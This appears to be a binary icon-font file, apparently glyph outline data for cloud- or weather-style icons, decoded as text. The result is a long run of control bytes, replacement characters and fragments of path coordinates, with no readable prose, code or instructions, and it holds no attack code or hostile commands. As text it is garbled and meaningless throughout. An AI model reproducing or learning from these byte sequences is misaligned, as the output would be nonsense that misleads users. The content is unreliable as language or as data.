<T/:pP	O1B^^B1O.R=#1)eH�-5KK5(88((8 K5 (88(%%% 8(�%%


 %`����!8Pl#!"&54671<54>32>3294&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21`*6^B��B^6*#=R.7^/Hg`K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%�O1B^^B1O.R=#1)eH�-5KK5(88((8 K5 (88(%%% 8(�%%


 %`����!CP]jw��3!2654&'14654&#".#"1%#!"&54671<54>32>329132654&104610#"&5132654&104610#"&57132654&104610#"&5�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��(()'PP 00�(()'PP 00�(()'PP 00�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH�2*,"YY!::!*,"YY!::*,"YY!::`���� -:G#!"&54671<54>32>3214610#"&54610#"&574610#"&5`*6^B��B^6*#=R.7^/Hg��PP')((�PP')((�PP')((�O1B^^B1O.R=#1)eH�2"YY",* "YY",* "YY",*
`����!I^kx��������1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>32132654&104610#"&5132654&104610#"&57132654&104610#"&5"326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T��(()'PP 00�(()'PP 00�(()'PP 00P	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��*,"YY!::!*,"YY!::*,"YY!::�	@		@	Y.-
�		

�
-
.	`����&:GTap���1#!"&5467<54>321>32'<54&#">3214610#"&54610#"&574610#"&5"326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(��PP')((�PP')((�PP')((0	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	��"YY",* "YY",* "YY",*�	@		@	Y.-
�		

�
-
.	`����!Wu������1.54632>321#!"&5467%>7>7#"&5467.#"3!2654&'.'9'9.#".'.54673:3132654&104610#"&5132654&104610#"&57132654&104610#"&5�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI��(()'PP 00�(()'PP 00�(()'PP 00�	Pp:/T<

E-5KK5-F
�+		T<
^>

#=R.O1B^^B1O%@

$/JIg��*,"YY!::!*,"YY!::*,"YY!::`����4Q^kx1#!"&5467<54>32.5467>73267'>7*#"&5<5>3214610#"&54610#"&574610#"&5)*6^B��B^6*#=R.3L9		T<
Ig*6

/1��PP')((�PP')((�PP')((p@%O1B^^B1O.R=#

>^
<T		+gIJ/$

��"YY",* "YY",* "YY",*`����!Cs��3!2654&'14654&#".#"1%#!"&54671<54>32>32954&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�
	


	

a
	


	

�
	


	

�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH�y$		$
$		$
$		$
$		$
2$		$
$		$
`���� P��#!"&54671<54>32>32154&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.`*6^B��B^6*#=R.7^/Hg�
	


	

a
	


	

�
	


	

�O1B^^B1O.R=#1)eH�y$		$
$		$
$		$
$		$
2$		$
$		$

`����!I^����
+1.54632>321#!"&5467%4654&#"1.#"3!2654&'.'9'9.#".'>3254&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'."326=4&#.2?64'14&+";265%2764/&�pP8[4<T)8K5��5K9*<gI5U
.R=#*6^B B^6*#(/3D*<T�`
	


	

a
	


	

�
	


	

1	
	
�
.
.Z	@		@
��.
.
�	Pp:/T<

E-5KK5-F
�Ig8-#=R.O1B^^B1O(F	
'#,T<��$		$
$		$
$		$
$		$
2$		$
$		$
b	@		@	Y.-
�		

�
-
.	`����&:j�����1#!"&5467<54>321>32'<54&#">32154&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'."326=4&#.2?64'14&+";265%2764/&#*6^B��B^6*#=R.
U5IgT<*D3/(�`
	


	

a
	


	

�
	


	

1	
	
�
.
.Z	@		@
��.
.
yF(O1B^^B1O.R=#-8gI<T,#'
	��$		$
$		$
$		$
$		$
2$		$
$		$
b	@		@	Y.-
�		

�
-
.`����!Wu��1.54632>321#!"&5467%>7>7#"&5467".#"3!2654&'.'9'9.#".'.54673:354&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.�pP8[4<T)8K5��5K9*F
<T		9L3.R=#*6^B B^6*1/

6*gI�Q
	


	

a
	


	

�
	


	

�	Pp:/T<

E-5KK5.E
�,		U;
_>

#=Q/P1B^^B1O%A

$/JIg��$		$
$		$
$		$
$		$
2$		$
$		$
`����4P���1#!"&5467<54>32.5467>33267'>7*#"&5<5>3254&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.54&#"'&?326=676&/7>'.)*6^B��B^6*#=R.3L9		T<
Ig*6

/1�Q
	


	

a
	


	

�
	


	

pA%O1B^^B1P/Q=#

>_
;U		,gIJ/$

��$		$
$		$
$		$
$		$
2$		$
$		$
`@� X��%#"3!2654&+4&#".#"732654&'14654&#".#"11>7<14632>329.5467<54>32>71<14632>321++#!"&5467932654&+4&#".#"1#"1>329	%
!%�	�5K8)T<4[8Pp*9$	8('
 1
��")6*#=R.9	8('
 1
(/!	
*6^B�/!�!/�%
!%	/)G�%%	
K5-E

<T/:pP	
F-$;(8$'G+1O.R=#(8$-!/'O1B^!//!�%%			#`@� Ty%#!"&54671<14632>327132654&'1.#".#"1>71>32:329>54&'1.#".#"01>321�(/!�!/%8('
 1
*�B^6*gH/^7.R=#*6G/+%=\(
1 
'(8

*?f�-!//!,(8$
1 ^B1OHe)1#=R.O1"<-=&+)-$8(			D6`���Bd5463232+#"&=#"&5463'3!2654&'14654&#".#"9%#!"&54671<54>32>329	
P
	P	
P
	�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�P
	P	
P
	P	
=
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH`���A#";326=32654&+54&#"%#!"&54671<54>32>329P	
P
	P	
P
	`*6^B��B^6*#=R.7^/Hg�
	P	
P
	P	
O1B^^B1O.R=#1)eH`���"DS3!2654&'14654&#".#"9%#!"&54671<54>32>329";2654&+�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�P	
�	
��
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eHS
	
	`���!0#!"&54671<54>32>329";2654&+`*6^B��B^6*#=R.7^/Hg�P	
�	
��O1B^^B1O.R=#1)eHS
	
	`���"DS`3!2654&'14654&#".#"9%#!"&54671<54>32>329%"326=4&#"&54632#�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg��	
	
	
	
�
F-5KK5-E

<T/:pP	O1B^^B1O.R=#1)eH-	�		�	�
	
	`���.=12654&#"%#!"&54671<54>32>329%"326=4&#
	
	W*6^B��B^6*#=R.7^/Hg��	
	
	
	
�O1B^^B1O.R=#1)eH-	�		�	
`���=EOX`ow���<54671<5<51045465>32>321#!"&'.5<517!4&'!1!>7!1!.''3.#"1!.'!*'9%3.#"!645<'1!.'"#!*'13!267!`6*&<M,7^/Hg*6Z<��=Y  �����L��66KU��j�..��\�m
�
�@, ,�641O*J71)eHO1:OO:(		@		 _	`?		�	`���!(1:DMU>5!!1!.'>321!>7!'.#"1!>71!4671!>7!1!>7#!"&'���Z
	��	�/4��:*:  :
�|��a�	��	�3��1��1  		�
	 `	@@		@�`@�@CKU^fu}��������%1#!"&'.5<5<5467<5<50454651>321>321%!4&'!1!>7!1!.''3.#"1!.'!*'9%3.#"!645<'1!.'"#!*'13!267!<54&#">329"326=4&#.2?64'14&+";265%2764/&�Z<��=Y6*&<M,
U5Ig#*6�� �����L��66KU��j�..��\�m
�
�@, ,�6UT<*D3/(�	
	
�
.
.Z	@		@
��.
.
�:OO:1O*J7-8gIF(O1(		@		 _	`?		��<T,#'
	3	@		@	Y.-
�		

�
-
.`@�@	AKU`ir����>71!!1!>5!1!6454&#"1.#"3.'>321.#".'!1!.'!1!4&'!1!.'1!.'1!3!267!"326=4&#.2?64'14&+";265%2764/&cF��Z���7gI5U
 :�	D*<T(/��-�
����i"	 	�  	F	�1 1� �	
	
�
.
.Z	@		@
��.
.
 @	Ig8-	#,T<	

@	@@		�		 �	@		@	Y.-
�		

�
-
.`@� QYclt������%1#!"&'.5<5<5467<5<5<54651>32.5467>332671%!4&'!1!>7!1!.''3.#"1!.'!"&#9%3.#"!645<'1!.'"#!*'13!267!>7*#"&5<5>321�Z<��=Y6*&<M,3L9		T<
*6�� �����L��66KU��j�..��\�m
�
�@, ,�6dIg*6

/1�:OO:1P*J7

>_
;U		,A%O1(@		 _		`?		��gIJ/$

`@� 	U_it}�>71!!1!>5!1!>7>7#"&5467.#"3.54673:31.#".'!1!.'!1!4&'!1!.'1!.'1!3!267!cF��Z���P
<T		9L3 :�6*gI1/��-�
����i"	 	�  	F	�1 1�  @	#		T<
^>


/JIg

@	@@		�		 �p��)<D/?'?1>7#"&5467"3267%4673:3#"&5/?G''II''I7''II''I��
<T		9LgI>^��6*gIJ/<T�4444Hhhhh�hhhhk		U;
_>IgL9+/JIg*6U;NNN�p��)1/?'?#"&5467>332671/?G''II''I7''II''I��^>IgL9		T<
�4444Hhhhh�hhhhk9LgI>_
;U		=NNN`�`,1>7#"&5467"3267%4673:3#"&5�
<T		9LgI>^��6*gIJ/<T�		U;
_>IgL9+/JIg*6U;`�`#"&5467>33267�^>IgL9		T<
�9LgI>_
;U		
�~B�(7FVeu��1"&54632'2654&#"3"326=4&#.2?64'4&+";26564/&"27126=4&#"3'2?64'&"1';2654&+"172764/&"IggIIggI<TT<<TT<			
�
-
.Y	@		@	Y.-
�	
		�
-.Y	@		@	Y.-
gIIggIIg T<<TT<<T�	@		@	Y.-
�			
�
-
.Y	@		@	Y.-
�	
		�
-.	�~B�*9IXhx�2654&#"3"326=4&#.2?64'4&+";26564/&"27126=4&#"3'2?64'&"1';2654&+"172764/&"IggIIggI			
�
-
.Y	@		@	Y.-
�	
		�
-.Y	@		@	Y.-
gIIggIIg�	@		@	Y.-
�			
�
-
.Y	@		@	Y.-
�	
		�
-.��B�/?O_p�";732654&+'#%6454&#"3&4546323"326=4&#1.2?64'14&+";2651!;2654&+"972764/&"1�		�]]�

�pp��gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-

	PP
	``@IggI<TT<@	@		@	Y.-
�			
	
		�
-.��B�!1ARgw#&4546321#'"326=4&#1.2?64'14&+";2651!;2654&+"9";732654&+'#2764/&"1�RgIIgR]]]			
�
-
.Y	@		@	��	@		@			�]]�

�pp�G.-
@IggIPP@	@		@	Y.-
�			
	
		O
	PP
	``'
-.��B�*:J[k�6454&#"3&4546323"326=4&#1.2?64'14&+";2651!;2654&+"972764/&"1"&546;732+'#�gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-
H		�]]�

�pp��IggI<TT<@	@		@	Y.-
�			
	
		�
-.��
	PP
	``��A�
.>O_t6454&#"!"326=4&#1.2?64'94&+";2651!;2654&+"972764/&"1"&546;732+'#�gIIg^�	
	
�
-.Y	@		@	��	@		@	Y.-
G		�]]�

�pp��IggI@	@		@	Y.-
�			
	
		�
-.��
	PP
	``��B�)8GWfv6454&#"3&4546323"326=4&#.2?64'4&+";265!;2654&+"172764/&""13!26514&#�gIIg T<<T �			
�
-
.Y	@		@	��	@		@	Y.-
H		@

@IggI<TT<@	@		@	Y.-
�			
	
		�
-.��
	
	��B�
+:JYi6454&#"!"326=4&#.2?64'4&+";265!;2654&+"172764/&""13!26514&#�gIIg^�			
�
-
.Y	@		@	��	@		@	Y.-
H		@

@IggI@	@		@	Y.-
�			
	
		�
-.��
	
	�@`
,;L.#"3>32"326=4&#.2?64'1!2764/&""13!26514&#!�^<<^!J//J�	
	
�
-.�P.-
H

@

��`7II7*66*	@		@	Y.-

-.�
	
	�@`%4E.#""326=4&#.2?64'1!2764/&""13!26514&#!�^<<^�	
	
�
-.�P.-
H

@

��`7II7	@		@	Y.-

-.�
	
		 `&Mt������20#"&5.#"#"&5<1>32#"&5.#"#"&5<5>32#"&5.#"#"&5<7>3"3!2654&#!4&#">32>51326=4&#"2?64'.1#";2654&#1%2764/&"1h��S		N��aa��N		S��hZ�yI		Dp�TT�pD		Iy�ZM�h?		:_}GG}_:		?h�M�		�		� pgI4T	B'<T
�
	
	�-.
`@		@		�.-
`M��g		a�}II}�a		g��M@Ct�Y		S�m>>m�S		Y�tC@9b�L		F{[44[{F		L�b9�`
	
	�Ig7+'T<! @		@		I.-
�		
	�-.
	 `&Mt������20#"&5.#"#"&5<1>32#"&5.#"#"&5<5>32#"&5.#"#"&5<7>3"3!2654&#!4&#">51326=4&#"2?64'.1#";2654&#1%2764/&"1h��S		N��aa��N		S��hZ�yI		Dp�TT�pD		Iy�ZM�h?		:_}GG}_:		?h�M�		�		� pgI4T.XQJ �
	
	�-.
`@		@		�.-
`M��g		a�}II}�a		g��M@Ct�Y		S�m>>m�S		Y�tC@9b�L		F{[44[{F		L�b9�`
	
	�Ig7+%1! @		@		I.-
�		
	�-.
 �MXbr���24.'54&#"463246324632#"&=4&#"3265463246324631%.#"1>75.#"'.#"1>79!9.'.#".#">79%.#".'1�!/K��d
	d��K/!!//!!//!!/


	%%/!!//!!//!�P)'U8 8U')�#sN!0�0!Ns#��
mI.BIIm
B.@%AsV40		04VsA%%%%%%�@

0		0&%�%%%%%
Wx��xW


Ehb;;bhE

2Q W3�Q23W  �O34&#"14&#"4&#"1#"&=463232654&#"4&#"4&#"4>754632`�/!!//!!//!!/%%	


/!!//!!//!!/K��d	
d��K%%%%%%�@%&0		0

�%%%%%%AsV40		04VsA ��&3@M132654&10132654&10132654&10%4610#"&5%4610#"&54610#"&5 (()'PP@(()'PP�(()'PP00 ��00 `00 P13(hh�13(hh��13(hh�EE�EE��EE ��&4610#"&54610#"&54610#"&5 PP')((@PP')((�PP')((P(hh(31�(hh(31�(hh(31���!132654.104>10#"&5�K55K(0((0( $$CCy2GG2YT;;TYEC00CE+..+���4>10#"&�(0((0(K55KyYT;;TY2GG	(#�4'4BJW�!!.77>7>721!.'!7!4&7!#"&'.'%!>7>2!.'!#"&'.''.10103267>106762103261067>10676&'."'1@`��+Qj���J��]7B,+*��iQ+��K	+,B�5ywk&	


.A,,;
@
;,,A.

	&kwy5.� 
`	 h	�

�	'	�9$7797 

 7977$9'#�4@.10103267>106762103261067>10676&'."'�5ywl&	


.A,,;
@
;+,B-


	&kwz4.!9$7797 

 7977$9�� /?7'?'?'?�((HH((H�''II''I�''II''I��??��??��llll�hhhh��hhhh��00��0�� '?'?'?�''II''I�''II''I��??��??��hhhh��hhhh��00��0@�/Uv9#!"&5467<54>32>32>32#'32654&+>54&#".#">3293!2654&'4654&#".#"1@^B��B^6*#=R.#M2"J-B^+9K5@@(88(	K5.F	+(=)/Hg	�K5 5K8)T<4[8Pp*9@1B^^B1O.R=#.=	$-^B	
E.5K 8((8!5K:+2%"eH	�5KK5-E

<T/:pP	
F-@�#C>54&'>54&#".#">329#!"&5467<54>32>321f3G9+^B-J")D6*Pv	$
^B��B^6*#=R.7^/Hg*6@J3.E
	B^-$	+"
#		kN
$`B^^B1O.R=#1)eHO1��@�,@>7>7#"&5467"7.54673:3";732654&+'r
<T		9L+$ (6*gI�~

�]]�

�ppJ.		U;
_>.MB(/JIg!J
	PP
	``��@�.>7>7#"&5467"7";732654&+'k
<T		9L0'y[��

�]]�

�ppR*		U;
_>0QhNR
	PP
	``��@�,@1>7#"&5467"3267%4673:3#"&5"&546;732+'�
<T		9LgI>^��6*gIJ/<T�

�]]�

�pp�		U;
_>IgL9+/JIg*6U;��
	PP
	``��@�-#"&5467>332671"&546;732+'�_>IgL9		T<
�F

�]]�

�pp�9LgI>_
;U		�
	PP
	```���.J4&#"34632#!!265%4&#"134632#!!265#1"&5133126514&#!5!21�K55K 8((88(� �5K��8((8 %%&���(8�%% 


�@�%5KK5(88((8 K5 (88(%%% 8(�%%


 %`��/L4&#"34632#!!265%4&#"134632#!!2651#1"&5133126514&#!5!29�K55K@%%%� �5K��K55K@%%&���5K�8((8@


�@�(85KK5%%%@K5�5KK5%%%@K5�`(88(


@8(@��2654&#"3PppPPppPpPPppPPp@��#"&54632�pPPppPPp�PppPPpp@��181"3"&5462654&#"3(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��#"&546322654&#"3 5KK5)77) PppPPppPDK55KD--DDpPPppPPp@��1"&54632'"3PppPPppPB^^BpPPppPPp @^BB^@��2654&#"3'463"&5PppPPppP�K55KpPPppPPp�5K�K5@��12#"&5462654&#"3(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��12#"&5462654&#"3%%5KK5PppPPppP@K55KK55K��pPPppPPp@��1"&54632'2654&#"3PppPPppPB^^BB^^BpPPppPPp ^BB^^BB^@��1"&54632'2654&#"3PppPPppP5KK55KK5pPPppPPp@K55KK55K@��1"32654&"&54632#(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��2#"&54632654&#"35KK5%%PppPPppP@K55KK55K��pPPppPPp@��12654&#"72#PppPPppPB^^BpPPppPPp @^BB^@��1"&5463274&#265PppPPpp0K55KpPPppPPp�5K�K5@��1812#2654&"&54632#(88(B^^BPppPPppP`^BB^^BB^��pPPppPPp@��>32#"&'>54&'2654&#"3�5KK5)77) PppPPppP<K55KD--D��pPPppPPp
`��
/=M]n~���#"&546?>54.#"7.54>322654&#"31"326=4&#1&6?6&'1.?>'96&/&671!?>'.95676&/&977>/.1=/!!/-�Du�YY�uD?l�SS�l?��	
	
�
9
9�\\\\�D\\\\�9
9

#!//!#
��!F%Y�uDDu�Y%F!	B"S�l??l�S"B- 	`		`	FN
O
����
O
N	`�� .>N_o���'!.54>32!>54&'2654&#"31"326=4&#1&6?6&'1.?>'96&/&671!?>'.95676&/&977>/.1=--��
Du�YY�uD
��-	
	
�
9
9�\\\\�D\\\\�9
9
��
#"H&Y�uDDu�Y&H"#
r@	`		`	FN
O
����
O
N` �`)@M%1".54>32'2>54.#"3041#"&5054>12654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P$8((8$%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<�H``(88(``H��%%%%` �`)>Ub%1".54>32'2>54.#"352>54.#"3041#"&5054>12654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I$8((8$%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`7�H``(88(``H��%%%%` �`):G132>54.#"4>32#".5!4&#"103265#4632#"&5`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<�8(``HH``(8�%%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(8$$8(%%%%` �`)>O\12#".54>"32>54.#"32>54.#2#".10>3"32654&#V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%%`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`7�8((8$$ %%%%` �`):G14.#"32>'#".54>32!32>10.#"3#"&54632�Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<� 8(``HH``(8�%%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(8$$8(%%%%` �`)>O\%1".54>32'2>54.#"352>54.#"3"&5463210#52654&#"3V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%% Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`78((8$$ %%%%` �`):G14.#"32>'#".54>32!4&#"10>5##"&54632�Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<��8((8$$ %%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�P(88(``HH``%%%%` �`)>O\14>32#".732>54.#"332>54.#"!463210.5332654&#"`Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`78((8$$ %%%%�V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�I(88(``HH``%%%%� `@"&55555'"32654&#3%5�@@ @�``�``�``�	
	
0`S����
��
�
�
�
-	�			��@�� `@	
 55%5%"32654&#3%5��`��@`��	
	
0`;��
��"�
��	�			��@�q����'Rg9#".'10&'.>7>'%>3210&'.'.>76.714.#"32>5Ag�L=o]G"b*D3%X�99$�7<~UHqK$��Bf�SR�fBAxYL~H-kD'K{2 3A *A1�7`�II�`77`�II�`75+ )e9=mZCM+5X=JYd4+ZSG(%$Nam70[N>+^M2k*J1Jbr;<AG'####q����*?>3210&'.'.>76.714.#"32>5qBf�SR�fBAxYL~H-kD'K{2 3A *A1�7`�II�`77`�II�`7]%$Nam70[N>+^M2k*J1Jbr;<AG'####��`<1"&54632'2654&#"3%"31265326514&+546;26514&+ 5KK55KK5(88((88(`B^
	�	
�K5�		�K55KK55K 8((88((8�^B�0	
0
	�5K
	��`<1"&54632'2654&#"3%"31265326514&+546;26514&+ 5KK55KK5%%%%`B^

�

�8(�

�K55KK55K@%%%%�^B�@



�(8

��`-:G326=4&+";26=4&#"+"&546;21"&54632'2654&#"3@
	^B@B^^B@B^
	K5@5KK5@5K��5KK55KK5(88((88(P	
B^^B��B^^B	
5KK5@5KK5`K55KK55K 8((88((8��`+9G"+"&546;232654&+";2654&#1%9"&54632'2654&#"31@
8(@(88(@(8

^B@B^^B@B^
��5KK55KK5%%%%@
(88(@(88(

B^^B��B^^B
�K55KK55K@%%%%t`��(5	3!26'&"62#!"&7"326=4&#2654&#"3��$5�5#��<		`�S`







���-@@-.""��  9�
�

�
��



t`��'%&"13!26%"&546327#"&=46312���<��#5�5#�Y






�.""��-@@ 



�

�

` �`)?L%1".54>32'2>54.#"310>7>101'2764'&"V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PDbcL!17bcL!17q66 Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<<71!Lcb71!Lcb66` �`)>Ta%1".54>32'2>54.#"352>54.#"310>7>101'2764'&"V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�IDbcL!17bcL!17q66 Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`771!Lcb71!Lcb66� �@)>KZix�%1".54>32'2>54.#"310>7>10'2764'&""326=4&#4&+";26526=4&#"3;2654&+"S�l??l�SS�l??l�SL�d::d�LL�d::d�L9Z[E"07Z[E"07[(("	
	
Q	a
	a	��	
	
��	a
	a	 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:770"E[Z70"E[Z((r	`		`	��

		��	a		a	R		

	� �@)>S`o~��%1".54>32'2>54.#"352>54.#"310>7>10'2764'&"12#"&=461+"&546;21"&=4632146;2+"&S�l??l�SS�l??l�SL�d::d�LL�d::d�LFz[55[zFFz[55[zF9Z[E"07Z[E"07[(("
	
	8	a	
a	��
	
	��	a	
a	 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: 5[zFFz[55[zFFz[570"E[Z70"E[Z((R	`		`	��		

��	a		a	2

		� �@)>M\kz�%1".54>32'2>54.#"310>7>10"326=4&#4&+";26526=4&#"3;2654&+"%10>7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L9Z[E"07Z[E"079	
	
Q	a
	a	��	
	
��	a
	a	/
&#.=;C ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:770"E[Z70"E[Z�	`		`	��

		��	a		a	R		

!
;</$%
D	� �@)>Sbq���%1".54>32'2>54.#"352>54.#"310>7>1012#"&=461+"&546;21"&=4632146;2+"&%10>7'S�l??l�SS�l??l�SL�d::d�LL�d::d�LFz[55[zFFz[55[zF9Z[E"07Z[E"079
	
	8	a	
a	��
	
	��	a	
a	
&#.=;C ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: 5[zFFz[55[zFFz[570"E[Z70"E[Zi	`		`	��		

��	a		a	2

		(
;</$%
D` �`)?K%1".54>32'2>54.#"310>7>101'10>7'V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PDbcL!17bcL!17p(#4EDZ Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<<71!Lcb71!LcbqED4#([` �`)>T`%1".54>32'2>54.#"352>54.#"310>7>101'10>7'V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�IDbcL!17bcL!17p(#4EDZ Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`771!Lcb71!LcbqED4#([`����'%4&#"32654&7#"&54674632@%%#K55K##^BB^#8((8�Q&%��:$5KK5$:"C'B^^B'C@(88(@����0%4&#"32654&7#"&54674&546329@%%#K55K#"#pPPp#K55K�Q&%��:$5KK5$:2K+PppP+K 5KK5��`����'4%4&#"32654&7#"&546746322654&#"3@%%#K55K##^BB^#8((8`(88((88(�Q&%��:$5KK5$:"C'B^^B'C@(88(��8((88((8@����0=%4&#"32654&7#"&54674&5463292654&#"3@%%#K55K#"#pPPp#K55K(88((88(�Q&%��:$5KK5$:2K+PppP+K 5KK5���8((88((8`����/C%#"&5467<=4632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
�

�Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<=4632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
�

�Q&%��:$5KK5$:2K+PppP+K 5KK5��`����/C%#"&5467<54632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
@

��Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<54632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
@

��Q&%��:$5KK5$:2K+PppP+K 5KK5��`����/C%#"&5467<54632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
�

� Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<54632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
�

� Q&%��:$5KK5$:2K+PppP+K 5KK5��`����.B%#"&5467<5463274&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
`

��Q&%��:$5KK5$:"C'B^^B'C@(88(@����.K%#"&5467<5463274&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
`

��Q&%��:$5KK5$:2K+PppP+K 5KK5��`���7#37##33"1}IR/�QqQ`�0p������`���`���#33�Q`�0p���������r�FWer10&'9'1067.'17.'10#"&1'&>7>7>32903261*#*97.10>3212654&#"3LbfgF
�WXzP
�^W;Mfk"$$"kgM;V_	

b

%%&&�+*P3
	.?E2$	
%ED8)/�  �/)8DE %tnNNnt% n�*

ּko�W�%%%%���r�+=J.'10#"&1'&>73265<'9'.#">3212654&#"3h^W;Mfk"$$"kgM;V_9'(8#

	
<%%&&.ED8)/�  �/)8DE(88(=%tnNNnt%

�%%%%��@�7#&'&4?#"&546;'&476213'"+"&546;'&4762546325./&47>5463276#7&4=463276232+"&'13>?6232+/.51#:;2+"/#"&=<7'"/#"&="'&4?2675#"&="'&4?#"&546;231�J�.

.�I@		'

	J.
	

.J	

'		@I�.



.�J@		&

	J-
	

.J
	
'

AVJ.
	
-J	

&		@I�-



-�IA

&
	
J-	

.J	

(		@J�.



.�JA		'
	
�@� 7#&'&4?#"&546;'&476213'"+"&546;'&4762546325./&47>5463276#7&4=463276232+"&'13>?6232+/.51#:;2+"/#"&=<7'"/#"&="'&4?2675#"&="'&4?#"&546;2312>54.#"3�J�.

.�I@		'

	J.
	

.J	

'		@I�.



.�J@		&

	J-
	

.J
	
'

AqL�d::d�LL�d::d�LVJ.
	
-J	

&		@I�-



-�IA

&
	
J-	

.J	

(		@J�.



.�JA		'
	
��:d�LL�d::d�LL�d:	� �@)6CP]jw{%1".54>32'2>54.#"31"&54632'2654&#"31"&54632'2654&#"3%2654&#"3!2654&#"335S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%% (88((88(%%%%��



 



� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 8((88((8 %%%% 







�  � �@+7CO[_%".54>322654&#"7"&546322654&#"7"&54632%2654&#"!2654&#"35S�l??l�SS�l??l��(88((88(%%%%(88((88(%%%%��


-


Ӡ ?l�SS�l??l�SS�l?�8((88((8 %%%% 8((88((8 %%%% 







�  
� �@)6CP]jw��%1".54>32'2>54.#"31"&54632'2654&#"31"&54632'2654&#"3%2654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%% (88((88(%%%%��



 



�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 8((88((8 %%%% 







��/!!//!!/ � �@+7CO[g%".54>322654&#"7"&546322654&#"7"&54632%2654&#"!2654&#"2654&#"S�l??l�SS�l??l��(88((88(%%%%(88((88(%%%%��


-


�!//!!// ?l�SS�l??l�SS�l?�8((88((8 %%%% 8((88((8 %%%% 







��/!!//!!/	� �@?Tan{���'>32.#"#.#"3265133265<57#".54672>54.#"31"&54632!1"&54632%2654&#"3!2654&#"31"&54632'2654&#"3*OBO[00[OBO.2
j
2.
8((8`8((8U:d�LL�d:ES�l??l�SS�l??l�S�%%%%%%%%��



 



